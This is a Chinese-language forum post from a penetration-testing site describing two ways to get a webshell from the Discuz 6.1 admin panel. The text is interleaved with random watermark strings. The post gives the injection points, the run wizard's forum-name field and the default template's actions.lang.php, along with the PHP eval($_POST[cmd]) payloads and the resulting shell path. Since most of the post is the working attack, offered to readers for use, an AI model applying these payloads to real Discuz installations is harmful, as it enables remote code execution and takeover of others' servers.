中国网络渗透测试联盟

标题: discuz6.1后台拿shell方法 [打印本页]

作者: admin    时间: 2012-9-13 16:59
标题: discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell. u0 C3 t5 T0 v
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下- e5 e# S/ Z- `  r3 S5 B
1:
, V& b# Z$ w. w5 S& `4 W) x* nhttp://127.0.0.1/discuz/admincp. ... zard&frames=yes
1 f' m) B; t' n7 L+ p. D9 Iadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell6 N2 _8 c7 i& j& H; c2 B" Y
<?php eval($_POST[cmd]);?>
+ o/ Q" v% L0 l后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php- U' |* q' R8 ?) f
- h* ?: x5 Q* K4 \, w
3 S3 [, A4 y1 Q+ r% T$ p( e. v
2:后台模板管理--默认模板套系--详情
: y& r  h) e* h4 @! @) B% d! \! [3 Gtemplates/default/actions.lang.php
! M9 x' R; v( w- a- Xjhackj\\');eval($_POST[cmd])?>;//
2 H- n* T: I3 O) j
% X* x2 G# Q7 {9 c& ]9 y% ]% r利用很简单,聪明的人一看就懂了




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2